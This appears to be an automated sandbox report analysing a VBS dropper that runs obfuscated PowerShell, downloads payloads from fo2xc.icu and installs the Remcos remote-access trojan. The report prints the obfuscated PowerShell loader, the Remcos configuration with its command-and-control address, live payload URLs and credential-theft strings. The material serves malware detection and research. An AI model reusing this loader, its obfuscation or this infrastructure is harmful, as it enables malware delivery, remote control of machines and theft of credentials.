              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs", ProcessId: 4324, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS Casn

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: 91 90 9E C4 42 DA EF F2 5E D6 07 41 E5 DA 6C F1 EA DC F2 7D 8A A2 DD 55 6D F2 0C D7 43 E1 63 AB A5 39 B1 1B 1B 60 28 33 E1 3F 5A 5F B7 9C 58 73 77 71 F5 6D 7A 40 B1 D1 C4 85 A7 43 02 AF 6A 47 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 3136, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-D98D6X\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T09:28:57.689337+010020365941Malware Command and Control Activity Detected192.168.2.549932154.216.18.622404TCP
              2024-12-31T09:28:58.988295+010020365941Malware Command and Control Activity Detected192.168.2.549942154.216.18.622404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T09:28:58.848927+010028033043Unknown Traffic192.168.2.549943178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T09:28:53.763489+010028032702Potentially Bad Traffic192.168.2.549905172.67.136.42443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.62:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-D98D6X", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: heteronymous.vbsVirustotal: Detection: 9%Perma Link
              Source: heteronymous.vbsReversingLabs: Detection: 23%
              Source: Yara matchFile source: 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3136, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Source: unknownHTTPS traffic detected: 172.67.136.42:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.136.42:443 -> 192.168.2.5:49905 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2440535401.0000000002E52000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2138518295.000002A57F901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2141134873.000002A57FB01000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A810F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_02A810F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A86580 FindFirstFileExA,7_2_02A86580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49942 -> 154.216.18.62:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49932 -> 154.216.18.62:2404
              Source: Malware configuration extractorIPs: 154.216.18.62
              Source: global trafficTCP traffic: 192.168.2.5:49932 -> 154.216.18.62:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49943 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49905 -> 172.67.136.42:443
              Source: global trafficHTTP traffic detected: GET /yAvXCrQD/Mestrende.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: fo2xc.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: fo2xc.icuCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.62
              Source: global trafficHTTP traffic detected: GET /yAvXCrQD/Mestrende.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: fo2xc.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: fo2xc.icuCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.3447223963.00000000243C0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.3447223963.00000000243C0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: fo2xc.icu
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDD880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fo2xc.icu
              Source: msiexec.exe, 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: msiexec.exe, 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/ZL
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604676727.00000000084B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp3w
              Source: msiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp6y
              Source: msiexec.exe, 00000007.00000003.2615970970.00000000084B4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604676727.00000000084B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp8
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpS
              Source: msiexec.exe, 00000007.00000003.2615970970.00000000084B4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604676727.00000000084B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gps
              Source: powershell.exe, 00000002.00000002.2302146865.0000020CF41A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co/
              Source: powershell.exe, 00000002.00000002.2295783227.0000020CEBC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDBBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2444923908.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exeString found in binary or memory: http://www.imvu.com
              Source: powershell.exe, 00000002.00000002.2302146865.0000020CF41A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
              Source: powershell.exe, 00000002.00000002.2302146865.0000020CF41A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cog
              Source: msiexec.exeString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDBBC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2444923908.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.i
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.ic
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDBDE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2263250482.0000020CDD347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu
              Source: msiexec.exe, 00000007.00000002.3434646364.00000000083FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.bin
              Source: msiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.binQ
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/y
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yA
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAv
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvX
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXC
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCr
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQ
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/M
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Me
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mes
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mest
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestr
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestre
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestren
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrend
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende.
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende.t
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende.to
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende.toc
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDBDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende.tocP
              Source: powershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fo2xc.icu/yAvXCrQD/Mestrende.tocXRnll
              Source: powershell.exe, 00000004.00000002.2444923908.0000000004C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2295783227.0000020CEBC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473117058.0000000005B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exeString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 172.67.136.42:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.136.42:443 -> 192.168.2.5:49905 version: TLS 1.2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0041183A OpenClipboard,GetLastError,9_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
